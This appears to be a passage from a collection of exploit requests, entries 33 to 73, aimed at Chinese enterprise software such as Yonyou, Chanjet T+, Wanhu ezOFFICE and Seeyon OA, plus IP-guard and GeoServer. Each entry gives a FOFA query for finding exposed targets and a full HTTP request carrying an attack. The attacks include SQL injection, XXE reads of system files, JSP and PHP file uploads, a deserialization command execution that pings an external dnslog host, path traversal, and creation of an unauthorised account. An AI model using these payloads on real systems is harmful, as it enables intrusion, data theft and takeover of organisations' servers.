Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 face-pass smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 has been created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 (Wanhu) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. 万户 (Wanhu) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 (Wanhu) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 (Wanhu) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 (Wanhu) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
